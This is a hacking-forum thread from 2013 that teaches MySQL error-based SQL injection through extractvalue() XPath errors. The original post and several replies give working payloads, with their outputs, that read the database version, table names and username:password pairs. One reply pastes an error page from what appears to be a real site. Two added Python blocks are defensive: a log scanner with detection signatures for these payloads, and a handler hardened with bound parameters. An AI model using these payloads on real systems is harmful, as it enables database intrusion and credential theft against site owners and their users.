Error-Based sql injection (a "new" approach)

Error-Based sql injection (a "new" approach) #1
Error-Based sql injection (a "new" approach)

It's with great excitement that I'm writing this little tutorial. I have been messing around with SQL injection for a while, and there's nothing I love more in hacking than sql injection. But that being said, I fucking hate error based injection. A million nested select queries that you cannot even remember just to get the database version. Always having to keep the cheat sheet at hand. So after messing around a lot I have come across a method that is so much easier.

First I will show an example that shows the old way and the new way. They are both doing the same thing: grabbing the database version.

Old code:
Code:
' and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)
Output: Duplicate entry '5.5.32-0ubuntu0.13.04.1' for key 'group_key'

New code:
Code:
' and extractvalue('%3Cxml%3E',concat(%22\\%22,(select version())))
Output: XPATH syntax error: '\5.5.32-0ubuntu0.13.04.1'

As you can see, we get the exact same result. The only thing is that we're now using the XPath errors to display the content.

One thing to keep in mind: the XPath errors will show you results up to 32 characters, so if you're for example extracting sha1 hashed passwords you need to use substring to get the content. Also keep in mind, we're adding a \ to create the error, so you're only seeing 31 characters of the query output.

Enough talk, let's get our hands dirty.

As shown above, here's the code to get the database version:
Code:
extractvalue('%3Cxml%3E',concat(%22\\%22,(select version())))
Output: XPATH syntax error: '\5.5.32-0ubuntu0.13.04.1'

Database and user
Code:
extractvalue('%3Cxml%3E',concat(%22\\%22,(select concat_ws('~',database(),user()))))
Output: XPATH syntax error: '\security~root@localhost'

Find number of tables in current database
Code:
extractvalue('%3Cxml%3E',concat(%22\\%22,(select count(*) from information_schema.tables where table_schema=database())))
Output: XPATH syntax error: '\4'

Get the names of all the tables (change the first number in limit to get the next table name)
Code:
extractvalue('%3Cxml%3E',concat(%22\\%22,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))
Output: XPATH syntax error: '\emails'

Extract content from a database (Just like the code above, increment the first number in the LIMIT clause to get the next result)
Code:
extractvalue('%3Cxml%3E',concat(%22\\%22,(select concat(username,':',password) from users limit 0,1)))
Output: XPATH syntax error: '\Dummy:p@ssword'

As you can see here, there's no need to be a SQL guru to write error based SQL injections! You can really do whatever you want, writing completely advanced queries inside the concat.

Another thing as well: when working with integer values you can inject this directly as the parameter, like this:
Code:
http://www.example.com/?id=extractvalue('<xml>',concat("\\",(select concat(username,':',password) from users limit 0,1)))

I hope you enjoyed this tutorial :)
Happy hacking
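From the defender's side, the two payload shapes in this post (the extractvalue()/concat() form and the older floor(rand(0)*2) ... group by form) are distinctive enough to flag in web server logs. The Python below is an added example, not code from the post or any project it mentions; the access log lines are constructed, the URL decoding loop is there because the third line is double-encoded, and the benign docs URL on the last line shows the signatures need a function call, not just the keyword.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log (not real traffic): the payloads mirror the thread's
# extractvalue() and floor(rand(0)*2) forms, line 3 is double URL-encoded, line 5 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Oct/2013:23:01:12 +0000] "GET /gallery.php?show_id=1 HTTP/1.1" 200 812
10.0.0.9 - - [20/Oct/2013:23:01:40 +0000] "GET /gallery.php?show_id=1%20and%20extractvalue(null,concat(0x2a,(select%20schema_name%20from%20information_schema.schemata%20limit%200,1))) HTTP/1.1" 500 301
10.0.0.9 - - [20/Oct/2013:23:02:05 +0000] "GET /gallery.php?show_id=1%2527%20and%20ExtractValue(%2527%253Cxml%253E%2527,concat(%2522%255C%255C%2522,(select%20version()))) HTTP/1.1" 500 301
10.0.0.9 - - [20/Oct/2013:23:02:30 +0000] "GET /gallery.php?show_id=1'%20and(select%201%20from(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 330
10.0.0.7 - - [20/Oct/2013:23:03:00 +0000] "GET /docs/mysql/extractvalue.html HTTP/1.1" 200 5120
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
SIGNATURES = {
    # XPath error channel: extractvalue()/updatexml() wrapping a concat() subquery
    "xpath_error_based": re.compile(r"\b(extractvalue|updatexml)\s*\(.*\bconcat\s*\("),
    # classic duplicate-key channel: floor(rand(0)*2) ... group by
    "duplicate_key_error_based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by"),
}

def fully_decode(value, max_rounds=3):
    """URL-decode until stable: double encoding is a common way past naive filters."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def normalise(query):
    """Decode, lowercase, drop inline comments and collapse whitespace before matching."""
    q = fully_decode(query).lower()
    q = re.sub(r"/\*.*?\*/", " ", q, flags=re.S)
    return re.sub(r"\s+", " ", q)

def scan_log(text):
    """Return (line_no, signature_name, decoded_query) for every request that matches."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group("target"):
            continue
        query = normalise(m.group("target").split("?", 1)[1])
        for name, pattern in SIGNATURES.items():
            if pattern.search(query):
                hits.append((line_no, name, query))   # one signature per request is enough
                break
    return hits
```

Run over SAMPLE_LOG this flags lines 2, 3 and 4 and leaves the plain request and the docs URL alone; the decoded query in each hit is what you would hand to whoever reviews the alert.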

RE: Error-Based sql injection (a "new" approach) #3
Awesome share, saves a lot of time.

RE: Error-Based sql injection (a "new" approach) #5
Glad you liked it. After more research I've managed to simplify this even more: replacing '%3Cxml%3E with null and %22\\%22 with 0x2a. The rest cannot be touched, so I guess this is about as short as an error based sqli injection can get (at least to my current knowledge hehe).

Code:
and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

Also, it should be mentioned that this works on MySQL >= 5.1.

RE: Error-Based sql injection (a "new" approach) #7
More thanks. When I tried the new way, the result is:
Code:
An internal error has occured.
XPATH syntax error: 'information_schema'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))
The old way is working fine.

RE: Error-Based sql injection (a "new" approach) #8
(10-20-2013, 11:01 PM)EgyptGhost Wrote: More thanks. When I tried the new way, the result is:
Code:
An internal error has occured.
XPATH syntax error: 'information_schema'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))
The old way is working fine.

I see nothing wrong with that, looks to be working to me.

RE: Error-Based sql injection (a "new" approach) #9
(09-30-2013, 06:36 PM)shp0ngl3 Wrote: Glad you liked it. After more research I've managed to simplify this even more: replacing '%3Cxml%3E with null and %22\\%22 with 0x2a. The rest cannot be touched, so I guess this is about as short as an error based sqli injection can get (at least to my current knowledge hehe).

Code:
and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

Also, it should be mentioned that this works on MySQL >= 5.1.

Or he can use a URL decoder.


(10-20-2013, 11:44 PM)chmod Wrote:
(10-20-2013, 11:01 PM)EgyptGhost Wrote: More thanks. When I tried the new way, the result is:
Code:
An internal error has occured.
XPATH syntax error: 'information_schema'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))
The old way is working fine.

I see nothing wrong with that, looks to be working to me.

I'll try again to discover what's wrong.

RE: Error-Based sql injection (a "new" approach) #10
(10-21-2013, 01:23 PM)EgyptGhost Wrote:
(09-30-2013, 06:36 PM)shp0ngl3 Wrote: Glad you liked it. After more research I've managed to simplify this even more: replacing '%3Cxml%3E with null and %22\\%22 with 0x2a. The rest cannot be touched, so I guess this is about as short as an error based sqli injection can get (at least to my current knowledge hehe).

Code:
and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

Also, it should be mentioned that this works on MySQL >= 5.1.

Or he can use a URL decoder.


(10-20-2013, 11:44 PM)chmod Wrote:
(10-20-2013, 11:01 PM)EgyptGhost Wrote: More thanks. When I tried the new way, the result is:
Code:
An internal error has occured.
XPATH syntax error: 'information_schema'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))
The old way is working fine.

I see nothing wrong with that, looks to be working to me.

I'll try again to discover what's wrong.

Look carefully: this is error based injection, so the error is normal. You're looking for what the error contains.

Code:
XPATH syntax error: 'information_schema'
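The response quoted in this exchange, the raw XPath error plus the full SQL statement echoed back to the client, is exactly the oracle error-based injection depends on, and it comes from two separate mistakes: building the query from the raw parameter and returning the database error verbatim. As an added example that is not from the thread, the Python below puts that handler beside a hardened one; it uses an in-memory sqlite table named after the leaked query as a constructed stand-in for MySQL, so the unsafe path fails with an unknown-function error rather than an XPath one, but the leak pattern and the fix are the same.

```python
import logging
import sqlite3
import uuid

log = logging.getLogger("gallery")

def setup_db():
    """Constructed in-memory sqlite stand-in for the table named in the thread's leaked query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE southbay_showimages (image_id INTEGER, show_id INTEGER)")
    conn.executemany("INSERT INTO southbay_showimages VALUES (?, ?)", [(1, 1), (2, 1), (3, 2)])
    return conn

def unsafe_count(conn, raw_show_id):
    """The pattern behind the leaked response: string-built SQL and the raw DB error echoed back."""
    sql = f"SELECT COUNT(image_id) AS count FROM southbay_showimages WHERE show_id={raw_show_id}"
    try:
        return str(conn.execute(sql).fetchone()[0])
    except sqlite3.Error as exc:
        return f"An internal error has occurred. {exc} Sql:{sql}"  # hands the attacker the oracle

def safe_count(conn, raw_show_id):
    """Hardened handler: strict integer check, bound parameter, generic client message.

    Returns (http_status, body). The DB error text never leaves the server; it is logged
    under a short reference id so support can still correlate the client's report.
    """
    try:
        show_id = int(raw_show_id)
    except (TypeError, ValueError):
        return 400, "Bad request"
    try:
        row = conn.execute(
            "SELECT COUNT(image_id) FROM southbay_showimages WHERE show_id = ?", (show_id,)
        ).fetchone()
        return 200, str(row[0])
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:8]
        log.error("db error ref=%s show_id=%r: %s", ref, show_id, exc)
        return 500, f"Internal error (ref {ref})"
```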